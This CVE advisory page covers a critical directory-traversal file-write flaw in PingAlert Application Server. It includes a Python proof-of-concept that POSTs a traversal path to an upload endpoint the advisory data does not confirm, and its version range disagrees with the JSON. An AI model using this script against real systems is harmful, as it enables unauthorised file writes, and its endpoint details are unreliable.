CVE-2025-54347

Description

A Directory Traversal vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows an attacker to write arbitrary files under certain conditions.

CVSS Details

CVSS Score

9.9

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:* - VULNERABLE

Desktop Alert PingAlert 6.1.0.11

Desktop Alert PingAlert 6.1.0.12

Desktop Alert PingAlert 6.1.0.13

Desktop Alert PingAlert 6.1.1.0

Desktop Alert PingAlert 6.1.1.1

Desktop Alert PingAlert 6.1.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-54347 Directory Traversal PoC
# Target: Desktop Alert PingAlert Application Server
# Affected Versions: 6.1.0.11 to 6.1.1.2

import requests
import os

target = "http://target-server:8080"  # Replace with target URL

# Directory traversal payload to write arbitrary file
payload = "../../../../../../windows/temp/test.txt"
malicious_content = "test"

# Endpoint for file upload/write operation
endpoint = f"{target}/api/file/upload?path={payload}"

try:
    response = requests.post(
        endpoint,
        data=malicious_content,
        headers={
            "Content-Type": "text/plain",
            "User-Agent": "Mozilla/5.0"
        },
        timeout=10
    )
    
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text}")
    
    if response.status_code == 200:
        print("[+] File write attempt successful")
    else:
        print("[-] File write attempt failed")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-54347
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-54347
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-54347/
[4] VulDB https://vuldb.com/cve/CVE-2025-54347
[5] https://desktopalert.net/cve-2025-54347/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-54347", "sourceIdentifier": "[email protected]", "published": "2025-11-24T22:15:49.330", "lastModified": "2025-12-05T20:28:19.223", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Directory Traversal vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows an attacker to write arbitrary files under certain conditions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.6", "matchCriteriaId": "3E233390-7D3C-4DAD-9947-030770EDAC05"}]}]}], "references": [{"url": "https://desktopalert.net/cve-2025-54347/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}